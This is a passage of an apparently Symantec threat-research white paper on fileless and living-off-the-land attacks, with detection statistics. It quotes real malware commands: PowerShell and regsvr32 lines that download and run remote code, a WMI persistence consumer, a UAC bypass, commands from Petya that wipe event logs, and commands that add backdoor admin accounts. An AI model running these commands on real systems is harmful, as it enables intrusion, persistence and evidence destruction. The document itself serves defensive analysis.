The malicious registry key references rundll32.exe which will in turn use LoadLibrary to load mshtml.dll after several tries to load other combinations of the arguments. It then starts RunHTMLApplication as the entry point, as specified in the arguments. This in turn will search for the protocol handler for JavaScript as it takes the full command line as an argument. As the first part after the JavaScript statement is a string in double quotes, it will be ignored and the actual payload after the ";" will be executed with whatever application is registered to handle JavaScript. This script can then load the actual payload from another registry key and decrypt it. Often the script will create a new ActiveX object so that it can make use of all the extended functionality. In the case of Poweliks the second part is a PowerShell script which will then load the DLL which is also stored as an encrypted string in the registry.

Figure 2. Poweliks load process




Symantec has multiple behavior detection patterns focused on fileless load point methods. For the method of loading scripts from a registry we saw nearly 100,000 detections from January to May 2017 (SONAR.Kotver!gen4). This shows that this is indeed the most common method used by attackers at the moment.

The same principle applies to services which are defined in the registry as well. An attacker can either manually add it to the registry or use the sc.exe command line tool to create the service. An example could look like this:

```
sc create Payloadservice binpath= "C:\Windows\
system32\cmd.exe /c start /b /min powershell.exe
-nop -w hidden [REMOVED]" start= auto
```

In the summer of 2016, Trojan.Kotver added yet another layer of obfuscation into the registry persistence method. During the first infection the threat creates a new file extension handle, for example .abcdef1234, and then registers it in the Windows registry under the following key:

```
\Software\Classes\.abcdef1234
```

The relevant default value then points to the corresponding \shell\open\command registry key, which contains the already known malicious script triggered by rundll32 and mshta.

Now every time a file with the extension .abcdef1234 is run, the Kotver script will be executed instead. In order to achieve the trigger the threat creates several garbage files with this extension and references them in a shortcut (.lnk) file dropped in the startup folder and in a batch file listed in a registry run key. The garbage

files are not malicious, they just act as trigger mechanisms. Changing the shell open command for a specific file extension has been used by various Trojans before but not in combination with the embedded script payload.

In June 2017, we saw another wave of the popular Downloader.Dromedan dropper, resulting in around 40,000 detections on the endpoint per day. After a successful infection the threat will create a registry run key with the name COM+ and the following value:

```
regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT%
scrobj.dll
```

This regsvr32 command downloads the remote SCT file when the computer starts and runs the embedded obfuscated JScript directly from memory.

Figure 3. JScript inside malicious SCT file

```
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="CLASS"
    classid="{F3011114-0000-0000-0000-4030F1ED1CDC}" >
    <script language="JScript">
        <![CDATA[
        var _0x5bdd=['\x52\x32\x56\x30',
        '\x56\x32\x6c\x75\x4d\x7a\x4a\x66\x55\x48\x4a\x76\x59\x32\x56\x7a\x63'
        '\x55\x32\x68\x76\x64\x31\x64\x70\x62\x6d\x52\x76\x64\x77\x3d\x3d',
        '\x64\x32\x6c\x75\x62\x57\x64\x74\x64\x48\x4d\x36\x63\x6d\x39\x76\x64'
        4\x7a\x4d\x6c\x39\x51\x63\x6d\x39\x6a\x5a\x58\x4e\x7a',
        '\x55\x30\x39\x47\x56\x46\x64\x42\x55\x6b\x56\x63\x54\x57\x6c\x6a\x63'
        2\x47\x63\x6d\x46\x74\x5a\x58\x64\x76\x63\x6d\x73\x67\x55\x32\x56\x30'
        '\x56\x32\x4a\x6c\x62\x56\x4e\x6a\x63\x6d\x6c\x77\x64\x47\x6c\x75\x5a'
        6\x30\x62\x33\x49\x3d','\x51\x32\x39\x75\x62\x6d\x56\x6a\x64\x46\x4e\x
        '\x63\x6d\x39\x76\x64\x46\x78\x6b\x5a\x57\x5a\x68\x64\x57\x78\x30',
```

The JScript verifies that PowerShell and .Net are installed and then uses WMI to start a PowerShell command. This command in turn will download an encrypted DLL into memory and use the common PowerShell reflective DLL loader code to execute it.

```
powershell.exe -nop -ep Bypass -noexit -c [System.
Net.ServicePointManager]::
ServerCertificateValidationCallback = { $true
}; iex ((New-Object System.Net.WebClient).
DownloadString('[REMOVED]'))
```

The now in-memory running DLL payload will create another PowerShell script, encode it and store it together with the DLL in a registry key and then add a PowerShell command line to another registry run key. This way the encrypted DLL can be decoded and run every time Windows starts.

```
powershell.exe -WindowStyle hidden
-NoLogo -NonInteractive -ep bypass
-nop iex ([Text.Encoding]::ASCII.
GetString([Convert]::FromBase64String((gp 'HKCU:\
Software\Classes\HNKINZHBHZCOBE').ZUEMAUZYQQBL)));
```

**Windows Management Instrumentation**

The Windows Management Instrumentation (WMI) provides a multitude of administrative capabilities for local and remote systems. It can be used to query system settings, stop processes, and locally or remotely execute scripts. Interaction is possible through the command line tool wmic.exe or through PowerShell and other scripts which have a wide integration. The WMI data is stored encoded in several files across the %System%\wbem\repository.

An attacker can create a filter for a specific event and create a consumer method to trigger the malicious script on these events. Such an event can be something simple such as a given time of the day, similar to a cron job on Unix. For this, three essential WMI classes are needed: the filter, consumer, and a FilterToConsumerBinding linking them both together. The payload that is executed is typically a PowerShell script and, like storing scripts in the registry, it is possible to store the complete payload in the WMI repository. This method was used by the Cozyduke attack group.

For more on WMI threats, read this informative BlackHat research paper by Graeber.

Figure 4. WMI consumer that starts PowerShell

```
__EventFilter
{   Name = "MyTrigger";
    EventNamespace = "root\\cimv2";
    Query = "SELECT * FROM __InstanceCreationEvent
        WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession'
        AND TargetInstance.LogonType = 2";
};

__CommandLineEventConsumer
{
    Name = "payload";
    CommandLineTemplate = "cmd /C powershell -nonint -nop
    -window hidden -executionpolicy bypass -enc  [REMOVED]";
};
```

**Group Policy Objects**

Windows Group Policy Objects (GPOs) can be used to add a load point for a backdoor. For example, they can be used to create a registry run key with a PowerShell script as the value. Given the right permissions on the system it can be created from the command line. An easier method is to use tools like the PowerShell Empire framework, which has this persistence method built in as a module and can create either new GPOs or modify existing policies. Since GPOs are rarely used on home computers, we have not yet seen a wide spread cyber crime campaign using this feature.

**Scheduled task**
A new scheduled task can be created that will execute a command at specific trigger moments on a local or remote system. For example, a PowerShell download command can be triggered with the following command line:

```
schtasks /create /tn Trojan /tr "powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep
bypass -nop -c 'IEX ((new-object net.webclient).
downloadstring(''[REMOVED]''))'" /sc ONLOGON /ru
System
```

Scheduled tasks can also be used to bypass User Account Control (UAC) and escalate privileges, when misusing system actions such as SilentCleanup for example. As this command is marked with auto-elevating, it will run with elevated privileges without prompting the user through UAC. The key is that it uses a user controlled environment variable as part of the path, which can be manipulated. As an example, an elevated shell can be achieved with the following two commands, first setting up the environment variable and then running the task:

```
reg add HKCU\Environment /v windir /d "cmd /K reg
delete hkcu\Environment /v windir /f && REM "
```

```
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\
SilentCleanup /I
```

**Call back on shutdown**
Call back on shutdown is another simple method which we have seen used a few times, although it is not permanently fileless. Some variants of Dridex create a normal registry run key load point and store the malware file on disk. At startup the malware loads to memory and then removes the registry entry and deletes the malware file on disk. From this point on the malware is only in memory and therefore fileless. The threat monitors the shutdown command. When a shutdown is initiated the threat will write itself back to disk under a new name and create a new registry run key linking to it. This ensures that it will survive following the next restart. This method minimizes the exposure of the file on disk.

**Infect existing files**
Strictly speaking this is not a fileless method but it is mentioned here for completeness. With this method the attacker does not drop any additional files but instead modifies existing files on disk.

The most obvious technique is to infect or replace files in the startup folder or files that are already loaded by other persistence methods. This was a common method used in the days when file infectors were widespread.

In corporate environments, where PowerShell is used, an attacker can place malicious code in any of the six available PowerShell profiles, if they are present. The injected code will then be executed each time PowerShell starts and loads the infected profile. In order to trigger the infected profile a benign PowerShell script can be placed in any of the previously discussed load points (similar to Trojan.Kotver and the new registered file extension .abcdef1234 discussed earlier).

In a similar fashion, attackers can infect browser files. For example, the Mozilla Firefox browser stores core files in the omni.ja archive file. An attacker can add his own JavaScript payload in there without raising any alarms as this file is not signed or checked. The context of the script even allows for full XPCOM scripts that could create a complete backdoor inside the browser. We discussed similar behavior being used by adware in 2009. Recent campaigns from Waterbug/Turla show that targeted attack groups are keeping an eye on the browser as well. Although in that particular case the attackers used a Firefox extension, a method which will be ineffective following the release of Firefox 57.

## Non-PE file attacks

A non-portable executable (non-PE) file attack generally involves some kind of script and a legitimate tool. Hence it is intrinsically a subclass of dual-use tool attacks, where the host system tool is a very powerful scripting framework (PowerShell, WScript, CScript). Consequently script attacks are not file-less, as there is a script file involved, which can be detected. However, due to the nature of scripts, such files can be easily obfuscated and are difficult to detect with static signatures alone.

Since the field of script attacks is so large, we will discuss it as its own class. For some of the scripts the required processing tool is installed by default, such as for JavaScript and PowerShell, while for others such as Word macros the Microsoft Word needs to be installed in order for the payload to work. Typically the Office document or PDF file contains the script code and it is triggered once the document is viewed. The document can also contain the full binary as an embedded object and ask the user to double click it. On a default configuration this will generate a warning message, but the user could be convinced with social engineering to ignore the warning.

Figure 5. Word document with embedded malware




Office documents do not always need macros in order to start scripts. A recently discovered PowerPoint file (Trojan.PPDropper) triggers a malicious PowerShell script once the user hovers over a link. The three key elements of the link were as follows:

```
action="ppaction://program"

Target = "powershell%20-NoP%20-NonI%20
-W%20Hidden%20-Exec%20Bypass%20%22IEX%20
(New-Object%20System.Net.WebClient).
DownloadFile([REMOVED]%5C%22%24env%3Atemp%5Cii.
jse%5C%22)%3B%20Invoke-Item%20
%5C%22%24env%3Atemp%5Cii.jse%5C%22%22"

TargetMode="External"
```

Decoded and cleaned up, the following PowerShell command line will get executed when the user hovers over the link:

```
powershell -NoP -NonI -W Hidden -Exec Bypass
"IEX (New-Object System.Net.WebClient).
DownloadFile('[REMOVED]','$env:temp\ii.jse');
Invoke-Item \"$env:temp\ii.jse\""
```

In November 2016, Symantec observed a large wave of W97M.Downloader being distributed through spam email. The attached document comprised a macro, which when executed invokes the WMI service to spawn a hidden instance of powershell.exe and downloads yet another PowerShell script. The second script contains a shellcode payload which performs a number of checks to identify virtual environments and interesting victim computers. In the end the PowerShell script drops and executes the financial Trojan Trojan.Pandemiya.

An extract of the malicious macro that starts the PowerShell script through WMI looks like this:

```
Sub AutoOpen()

[REMOVED]

Set objWMIService = GetObject("winmgmts:\\" &
strComputer & "\root\cimv2")

[REMOVED]

objProcess.Create o & " -ExecutionPolicy Bypass
-WindowStyle Hidden -noprofile -noexit -c if
([IntPtr]::size -eq 4) {(new-oabject Net.Webclient.
DownloadString(" & [REMOVED]

End Sub
```

Outside of documents, scripts can also be sent on their own, often inside an archive like a zip file. Script files can be triggered by various extension such as LNK, SCT, and HTA files. The final script could also be stored on a remote server or cloud storage host to harden detection even further.

Looking at Symantec's messaging protection telemetry, we observed the following file types directly, or inside archives, during the six-month period between January and June 2017. The file type used in attacks fluctuates considerably.

Figure 6. Top 7 malicious file types seen in email, January-May 2017




The non-PE file is typically distributed as an attachment in an email or on a website where social engineering is used to trick the user into opening the file. We have also seen scripts in self extracting archives or installer files. It's the usual cat-and-mouse game between attacker and defender, as soon as one file extension gets blocked attackers try to come up with another tactic. For example, in February 2017 Google began blocking .js files in Gmail but this did not have a significant effect on the number of malicious JavaScript file detections.

Figure 7. Monthly detections of script downloaders




PowerShell scripts are currently very common. With ready available toolkits such as Empire or PowerSploit it is easy to create and use such scripts during attacks. If you want to know more about script attacks, then we advise you to read our white paper on PowerShell threats or the Internet Security Threat Report (ISTR) which detail the increase of script downloaders and the use of malicious macros.

## Dual-use tools

System tools and clean applications can also be used for more nefarious purposes by attackers and, as such, can be referred to as dual-use tools. Dual-use tools are tools that can be used by an attacker to perform action that lead to their end goal.

For example, the two clean commands below create a new user and add it to the administrator group, if executed with the right permissions. These commands can be considered dual-use as they can be used by system administrators for legitimate reasons but can also be used by an attacker as a backdoor, especially when the RDP service is enabled as well.

- `net user /add [username] [password]`
- `net localgroup administrators [username] /add`

It should be noted that most system tools can be used in an unintended way. For example, notepad.exe could be used to overwrite all files on disk, making it a destructive Trojan. However, we will focus on the more obvious tools.

When attackers download additional tools they can be legitimate, such as Microsoft's PsExec, which is not present on most systems by default, or more on the grey side like credential dumper tools such as mimikatz or wce, which should not appear under normal circumstances on a user's computer. Therefore the dual-use tool type of attack does not always follow the living off the land methodology, which does not involve downloading additional binary files to disk.

To utilize the system tools, the attacker usually needs to pass specific arguments to the tool. This can be achieved on the command line when launching the tool, for example after gaining a remote command shell access. We have seen targeted attack groups, such as Trojan.Taidoor, connect to the compromised system and then manually issue command after command, including typos. Another method involves the use of batch script files with all commands predefined. The output of the commands is often redirected into a text file so that it can be harvested later. Such batch files are ordinary files and can be detected, if they are unique enough.

The following are examples of system tools executed by the Appleworm/Lazarus group:

- `query user >> %s`
- `net view /domain >> %s`
- `tasklist /svc >> %s`

The obvious advantage for the attacker is that there are only clean legitimate tools executed. This can bypass most application whitelisting approaches as well as some security tools. The key is in the command line arguments and how the tools are used as this can be the difference between being categorized as normal usage or malicious. In order to be able to monitor this, extended logging must be enabled, if available. Symantec's behavioral detection engine can track the behavior of any executed tool and link the various activity together.

To give you another example to illustrate why clean tools might bypass file scanning solutions, take the following incident which was observed during an investigation for a client. On the compromised computer was a clean piece of software that company employees had not installed themselves. This software was also referenced in a registry run key. The interesting part was that the registry value also contained a very long argument string that was passed to the software. It turned out, that the software in question was an outdated version with a known buffer overflow vulnerability. The argument in the registry key was exploiting this vulnerability and passing shellcode in the argument. This lead to the threat getting executed in memory every time the system was restarted. The attackers did not need to find the exploit themselves, they just needed the unpatched software package. The same method can be applied inside an installer package post-installation script.

Clean tools are also often misused for DLL Hijacking attacks, which involve dropping a clean application and a malicious DLL. Due to the order in which Windows searches for a required DLL, a malicious DLL in the same directory will be found first, instead of loading the legitimate one from the Windows system directory. This is normal

behavior for Windows and was, for example, misused by Trojan. Ratopak to attack several Russian banks and also by the Deep Panda attack group. A similar method is DLL side loading, which makes use of the WinSxS directory, which can contain multiple versions of various DLLs. At runtime the DLL loader will consult the manifest file and decide which DLL an application needs. An attacker can drop a malicious DLL with a suitable name in this folder and have it loaded by a clean application in order to run the payload. Both of these methods involve dropping malicious DLL files on disk, which can be detected by common means.

We can group dual-use tools into different categories based on the purpose they are used for in targeted attacks.

### Table 1. Dual-use tools, grouped by purpose

| Type of internal activity | Purpose | Dual-use tools |
|---|---|---|
| **Internal network reconnaissance** | Enumerate information about a target environment | net (net user, net start, net view), systeminfo, whoami, hostname, quser, ipconfig |
| **Credential harvesting** | Obtain legitimate user credentials to gain access to target systems for malicious purposes | Mimkatz, WCE, pwdump |
| **Lateral movement** | Gain deeper access into target network | RDP, PsExec, PowerShell |
| **Data exfiltration** | Send data back to attackers | FTP, RAR, ZIP, iExplorer, PuTTY, PowerShell, rdpclip |
| **Fallback backdoor** | Enables a backdoor that can be used, should the main backdoor be removed | Net User, RDP, Telnet server |

**Example: Ransom.Petya**

On June 27, 2017 a modified version of Ransom.Petya quickly began infecting organizations primarily in Eastern Europe. The ransomware was exhibiting wiper characteristics and immediately gained the attention of both security experts and the media, as it was exploiting the SMB EternalBlue vulnerability just like Ransom. WannaCry did one month earlier. However, in addition Petya also made heavy use of system commands during the infection process. To begin with, the threat came as a DLL that was executed by rundll32.exe:

```
rundll32.exe perfc.dat, #1
```

Once executed, Petya drops a recompiled version of LSADump from Mimikatz in a 32-bit and 64-bit variant, which is used to dump credentials from Windows memory. The account credentials are then used to copy the threat to the Admin$ share of any computers the threat finds on the network. Once the threat accesses a remote system it will execute itself remotely using a dropped PsExec.exe and the WMI command line tool wmic.exe:

```
wmic.exe /node:[IP Address] /user:[USERNAME] /
password:[PASSWORD] process call create “C:\
Windows\System32\rundll32.exe \”C:\Windows\perfc.
dat\” #1 60”
```

In order to hide its tracks on the compromised computer the threat deletes various system logs by using the wevtutil and fsutil commands:

```
wevtutil cl Setup & wevtutil cl System & wevtutil
cl Security & wevtutil cl Application & fsutil usn
deletejournal /D %c:
```

Petya then creates a scheduled task so that the computer restarts into the modified MBR and performs the final encryption task:

```
schtasks /RU “SYSTEM” /Create /SC once /TN “” /TR
“C:\Windows\system32\shutdown.exe /r /f” /ST 14:42
```

This clearly shows how powerful system commands are and how they can be used during cyber attacks. Administrators should consider disabling the remote execution of PsExec and WMI commands, if possible in their environments.

**System configuration**

With access to a compromised computer an attacker can modify certain settings to foster further attacks or to have a fall back backdoor should everything else be detected and removed. Most of this is achieved with the help of system tools.

A common, and low tech, method we have seen attackers use to create a backdoor is adding a new user account and then enabling RDP services so that the attacker can later connect back to the computer.

Attackers can also redirect network traffic by either setting a new DNS server or adding malicious resolutions to the local hosts files. Some financial Trojans change the DNS server and then remove themselves, leaving no traces apart from the changed DNS server. Trojan.Zlob.Q uses a PowerShell script to change the NameServer entry in the registry, stored under the following key:

```
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Tcpip\Parameters\Interfaces\
```

Since the hosts file has been misused frequently in the past, it is very often monitored or even set as read only. However, similar results can also be achieved by setting the proxy settings for the whole system or for the browser.

Yet another method is the Sticky Key attack, where local helper tools like sethc.exe or utilman.exe are replaced with the command prompt cmd.exe. An attacker with access to the login screen can hit the shift key multiple times, invoking the helper tool that was replaced with cmd.exe, providing a command shell without logging in. As an added bonus, this shell runs with elevated privileges and does not generate a login event in the log files. The same can be achieved by adding cmd.exe as a debugger to the on-screen keyboard through a registry key.

A variant of the W32.Kribz information stealer, also known as the EyePyramid threat, was active at the beginning of 2017 in Italy. After successful infection the threat lowers the security settings of the compromised computer by disabling various security tools and enabling file shares for the local machine. In addition it will disable User Account Control (UAC) and other logging functionality. For later spreading it enables macros in Microsoft Office by default and also allow scripts without restrictions. Furthermore it attempts to create a local admin user and add it to the domain administrator group in the Active Directory. These simple steps allow the attackers so spread further in the network without raising any alarms and come back if they need to.

As these attacks simply modify computer settings they might be difficult to detect with general rules. But a well-managed environment can look out for any changes to these settings and raise the alarm if modifications are detected.

**Hardware assisted attacks**

There are also threats that use manipulated hardware devices to change the behavior of a target system. In most cases they do not drop files on the target system, so these attacks can be considered fileless. It is the interaction with the system that results in the unwanted behavior. Since these attacks use physical devices such as USB keys, an attacker usually needs physical access to the target computer in order to implant the device, but the computer does not have to be unlocked. This could happen in a hotel room or during a lunch break at an office. Of course dropping devices in a parking lot or sending them as gifts through mail may work as well.

In the case of BadUSB, a modified USB device tricks the computer into thinking it's a USB ethernet adapter and adds malicious DNS server settings to the system. Depending on the configuration this overwrites any other already set DNS settings. The attacker can then perform man in the middle (MitM) attacks against the re-routed network traffic.

Since 2012, USB HID attacks, which use programmable embedded development platforms such as Teensy devices, have become common. In these attacks the USB device emulates a human interface device (HID) class, for example a keyboard, and then starts to automatically send key strokes to the target computer. Such commands can then use any of the previously discussed system tools to carry out an attack. As all this happens very fast, a user might not notice the attack until it is too late.

There are also various direct memory access (DMA) related attacks, such as PCI leech or the Thunderbolt attack on Macs, as well as complete bootkits like Thunderstrike. Attackers can step up to the next level of sophistication with firmware malware inside devices or even the CPU itself. Such attacks are rare as they are not easy to pull off, but they do happen as our colleagues at Kaspersky saw for themselves with firmware malware for hard drives used by the Duqu 2 group.

# Prevalence of dual-use tools



Section

# 03

Symantec™

## Prevalence of dual-use tools

There are many clean system tools like ipconfig which are executed many times for legitimate purposes but are also used for illegitimate purposes by attackers. In addition, both pen testers and criminals are increasingly making use of tools like the Windows Credentials Editor (WCE) that can dump passwords from memory. While a system administrator may sometimes use these tools, it is unlikely a regular user would have a legitimate reason to do so. Therefore, it is not always possible to determine whether a tool was used maliciously.

The most commonly used tool from a list from January 2017 (Table 2) was the system service tool sc.exe which was used on 2.7 percent of monitored computers. This was followed by remote access tools like VNC, Ammyy, and Teamviewer which were used on approximately 2 percent of all monitored computers. It should be noted that remote access tools are not malicious on their own, but they can be used in a malicious context by the attacker.

Table 2 shows 35 dual-use tools and how often they were used on computers. The list does not distinguish between malicious usage and legitimate usage. Only four tools were seen used on more than one percent of all analyzed computers, PowerShell is one of them.

Table 2. Usage of dual-use tools, January 2017

| Tool | Usage count |
|---|---|
| sc.exe | 2.7190% |
| vnc | 2.1176% |
| net.exe | 1.2733% |
| powershell.exe | 1.0263% |
| ipconfig.exe | 0.8227% |
| netsh.exe | 0.7526% |
| teamviewer.exe | 0.6224% |
| tasklist.exe | 0.4963% |
| rdpclip.exe | 0.3226% |
| rar.exe | 0.3139% |
| wmic.exe | 0.3027% |
| find.exe | 0.2767% |
| curl.exe | 0.2027% |
| netstat.exe | 0.1938% |
| systeminfo.exe | 0.1641% |
| wget.exe | 0.1208% |
| nc.exe | 0.1174% |
| gpresult.exe | 0.1147% |
| whoami.exe | 0.1109% |
| ammyy.exe | 0.1061% |
| query.exe | 0.0869% |
| sdelete.exe | 0.0190% |
| psexec.exe | 0.0070% |
| csvde.exe | 0.0051% |
| dumpel.exe | 0.0040% |
| lazagne.exe | 0.0018% |
| pwdump | 0.0012% |
| dumpsec.exe | 0.0008% |
| netcat.exe | 0.0006% |
| mimikatz.exe | 0.0003% |
| wce.exe | 0.0001% |
| cachedump.exe | <0.0001% |
| bruter.exe | <0.0001% |
| gsecdump.exe | <0.0001% |
| winscanx.exe | <0.0001% |

The number of mimikatz.exe occurrences might seem quite low on this list, despite that fact that it currently a very common tool used by criminals for obtaining credentials. The reason for this is that at the moment the preferred method is to download Mimikatz with PowerShell directly into memory and execute it from there. Direct memory executions are not counted in Table 2. In addition, there are many modified versions of Mimikatz used which are caught under generic names by heuristics.

There are some dual-use tools that are frequently used together. For example, a lateral movement tool is often preceded by a credential dump tool in order to get the required password. However, there is no clear favorite combination used by cyber criminals. This might be because there are many tools that can achieve similar things, making the number of combination possibilities quite large. Figure 8 shows the occurrences of PsExec and either Mimikatz or WCE, which indicate only a slight correlation.

Figure 8. PsExec and Mimikatz plus WCE usage




There can be huge fluctuation in the usage of system tools and there are many reasons for this. A company might decide to use a different method to administrate its systems, it might install a new software application that makes use of different system tools, or it may use its regular tools more frequently due to a new roll out. The usage percentage for attackers depends more on the mitigation practices that are in place and if a given method is still effective.

Figure 9. Usage of dual-use tools in 2017




If we look at classical malware then mainly non-PE file attacks are used during the attack vector. Once the payload is dropped it is still less than 10 percent that make use of advanced fileless techniques. From all malware submitted to our sandbox in 2016 only an average of two percent misused WMI. A jump to five percent corresponds with an increase of WMI usage inside of malicious macros to execute the payload. For targeted attacks the numbers are much higher as we will see in the next chapter.

Figure 10. Percentage of malware using WMI



# Dual-use tools in targeted attacks



Section

04

Symantec™

## Dual-use tools in targeted attacks

The living off the land techniques are not just popular with cyber criminals but also with targeted attack groups, as fileless attacks are harder to detect and leave less traces for forensic analysis or for attribution. Thanks to these characteristics nearly all targeted attack groups have used fileless malware techniques at one point or another by now. However, this isn't a new development, for example the Taidoor group in 2011 relied heavily on system tools to explore newly compromised systems. But we are also seeing more recent examples such as the attack against the Democratic National Committee (DNC) in 2016, which made use of PowerShell for lateral movement and discovery and used a WMI fileless persistence method. And the Calcium/Fin7 group uses PowerShell payloads and recently attacked restaurants with an RTF document containing JavaScript. The first stage script extracts another script into randomly named files on disk and creates a scheduled task to start it a minute later. This is probably done in an attempt to confuse behavior tracing tools. The script then creates a PowerShell script, which in turn runs yet another PowerShell command to fetch a Meterpreter payload and run it in memory. The new technique used by this variant is that the script downloads the shellcode through DNS requests to make it even stealthier.

Table 3 is an overview of 10 targeted attack groups and the different dual-use tools they used during at least one of their attacks. It is also interesting that all 10 groups still deployed custom tools for some of the attack phases. Depending on their target environment, attackers may change their tactics and rely more or less on dual-use tools.

Table 3. Some of the typical tools used by attack groups

| Group name | Reconnaissance | Credential harvesting | Lateral movement | Custom built tools |
|---|---|---|---|---|
| **Tick** | whoami, procdump, VBS | WCE, Mimikatz, gsecdump | PsExec | Yes |
| **Waterbug** | systeminfo, net, tasklist, gpresult,... | WCE, pwdump | Open shares | Yes |
| **Suckfly** | tcpscan, smbscan | WCE, gsecdump, credentialdumper | – | Yes |
| **Fritillary** | PowerShell, sdelete | Mimikatz, Powershell | PsExec | Yes |
| **Destroyer** | Disk usage, event log viewer | kerberos manipulator | PsExec, curl, VNC | Yes |
| **Chafer** | network scanner, SMB bruteforcer | WCE, Mimikatz, gsecdump,... | PsExec | Yes |
| **Greenbug** | Broutlook | WCE, gsecdump, browdump, ... | TeamViewer, PuTTY | Yes |
| **Buckeye** | os info, user info, smb enumerator,... | pwdump, Lazagne, chromedump,... | Open shares | Yes |
| **Billbug** | ver, net, gpresult, systeminfo, ipconfig, ... | – | custom backdoor | Yes |
| **Appleworm** | net, netsh, query, Telnet, find, ... | dumping SAM, | RDP bruteforcer, RDclip | Yes |

### Incursion phase

Dual-use tools and living off the land tactics are widely used in current attack vectors. While the vector of a document with malicious macros or embedded payload, as well as script files, are omnipresent, dual use tools are also used by attackers. For example the SamSam group, who attacked organizations to implant ransomware, made use of PsExec and RDP to compromise targets. By brute forcing the passwords of accounts they were able to infiltrate the networks. In addition they also attacked JBoss webservers with the pen tester tool JexBoss.

### Discovery phase

Various system tools may be used, especially during the information gathering phase of an attack. This makes sense as there is no need to program the same functionality into the attacker's malware. Some groups simply call the system functions from within their tools. With the increased use of PowerShell as an attack framework, we have seen a growing number of groups using the PowerShell command equivalent to get the same information within the scripts. Once the environmental information is gathered and analyzed the attackers may decide to deploy the suitable payload or remove itself completely if they think that it's not a real target system or not one of interest.

Table 4. Examples of system tools used for information gathering

**Group: Waterbug/Turla**

- systeminfo
- net view
- net view /domain
- tasklist /v
- gpresult /z
- netstat -nao
- ipconfig /all
- arp –a
- net share
- net use
- net user administrator
- net user /domain
- net user administrator /domain
- tasklist /fi
- dir %systemdrive%\Users*.*
- dir %userprofile%\AppData\Roaming\Microsoft\Windows\Recent*.*
- dir %userprofile%\Desktop*.*

**Group: Appleworm/Lazarus**

- hostname
- whoami
- ver
- ipconfig -all
- ping www.google.com
- query user
- net user
- net view
- net view /domain
- reg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\"
- tasklist /svc
- netstat -ano | find \TCP\
- msdtc [IP] [port]

**Group: Billbug**

- net user
- ipconfig /all
- net start
- systeminfo
- gpresult

**Group: Taidoor**

- cmd /c net start
- cmd /c dir c:\docume~1\
- cmd /c dir "c:\docume~1\<CurrentUser>\recent" /od
- cmd /c dir c:\progra~1\
- cmd /c dir "c:\docume~1\<CurrentUser>\desktop" /od
- cmd /c netstat –n
- cmd /c net use

### Lateral movement phase

In some cases administrative software packages are misused. The group behind Trojan.Jokra hijacked the legitimate patch and security update process within one of the compromised targets. Piggybacking on this system allowed the attacker to quickly distribute their payload to almost all computers in the target organization.

Another example of an attack group misusing pre-existing software is the Butterfly group. This targeted attack group took advantage of internal systems to spread through a network once they gained initial access. In one instance, the attackers used a Citrix profile management application to create a backdoor on a

newly infected system. This application can be used to install other applications or manage a user's profile for authentication. It's likely that the attackers took advantage of this system and placed the backdoor in a specific profile, which was triggered when the profile's owner logged in. In the second incident, the TeamViewer application was used to create copies of Backdoor.Jiripbot on compromised computers. TeamViewer was legitimately present on the computers and was taken advantage of by the attackers.

Of course targeted attackers are not solely reliant on preinstalled system tools. In most cases they will download and drop additional tools as well, sometimes greyware tools, to help with lateral movement. In order to remain stealthy, these tools can be downloaded to memory and executed without touching the hard disk.

Many tools, such as PsExec or Netcat, are not malicious but can be used in a malicious context. For example, the Odinaff group used the dual-use tools listed in Table 5 during its attacks. With Mimikatz the attackers were able to dump user passwords from memory. The network scanner allowed the group to identify other computers in the same local network. The dumped credentials were then used with PsExec or PowerShell to start a new process on one of the identified remote computers. Once the backdoor or the remote access tools are installed on the new target, a simple takeover is completed and the cycle can start from the beginning again.

Table 5. List of dual-use tools used by the Odinaff attack group

| Tool: | Description: |
| --- | --- |
| **Mimikatz** | A popular open source credential recovery tool |
| **PsExec** | A Sysinternals tool form Microsoft, that allows to run processes on local and remote computers |
| **Netscan** | A network scanning tool, to find other targets |
| **Ammyy Admin** | A legitimate remote access tool |
| **RunAs** | A systemtool for running processes as another user |
| **PowerShell** | The popular scripting framework that can be used for nearly anything, including lateral movement |
| **Backdoor.Gussdoor** | A simple backdoor Trojan |

**Exfiltration phase**

System tools can also be used to exfiltrate any gathered information during an attack. First the data needs to be found, gathered, and prepared for its journey. For example, the Seaduke attack group used the common WinRAR archiving tool with a 110 character long password to protect the stolen documents. The data can then be sent to a remote drop server with common tools like FTP, winSCP, Curl, or Wget. The archive file can also be posted to a website using a preinstalled web browser. A HTTP GET request and passing encoded information as part of a URL argument has also been observed. The Fritillary/Cozy Bear group made extensive use of public cloud services such as Twitter and GitHub for command and control communication and data exfiltration. Hiding stolen data inside legitimate cloud services is a common tactic as many companies have no methods of analyzing such traffic. Depending on the environment, such communication may blend in with normal traffic and raise less attention than, for example, a sudden connection to a TOR server.

# Conclusion

Section

05

Symantec™

## Conclusion

Using fileless attack techniques and malicious scripts is an obvious choice for attackers, one which is made easier by various, widely available tools. So it's no surprise that many cyber criminals and targeted attack groups have embraced living off the land tactics. Symantec expects this trend to continue.

Attackers are relying on existing tools to blend in with everyday system work and not raise additional alarms. Misusing clean system tools can bypass many protection mitigations like application whitelisting. It is very common to steal credentials and misuse them for lateral movement inside a network. Also, any scripts used in attacks can be obfuscated by trivial techniques making them as good as invisible to traditional static signature detection methods. For the attackers, scripts bear the advantage that they can be updated and adapted quickly without a huge development cycle, making them more flexible and individually tailored for their environmental purpose. These points combined lead to many traditional security solutions having issues reliably blocking fileless attack techniques.

Sandboxes are often not configured to handle script attacks and may let them pass through unblocked. One of the best methods for detection is a combination of memory scanning with heuristics and behavior based detection which also monitors system tools. We have seen attackers trying to hinder behavioral detection by splitting the code into multiple modules and distributing it over multiple command calls in order to break a simple chain of events. However, Symantec's behavioral detection engine cannot be bypassed that easily. Fileless or dual-use tool attacks either use a remote code execution (RCE) vulnerability, stolen or guessed credentials, or a non-PE file like a script during the initial incursion phase. Hence they can be detected at the incursion phase before any further damage can be done.

The increasing use of living off the land tactics means sharing indicators of compromise (IoC) is becoming more difficult, as sharing file hashes for system tools is useless and scripts are often polymorphic. Instead, techniques and tactics need to be shared in order to be able to filter how these tools are used in context.

## Protection

Adopting a multilayered approach to security minimizes the chance of infection. Symantec suggests a strategy that protects against malware in three stages:

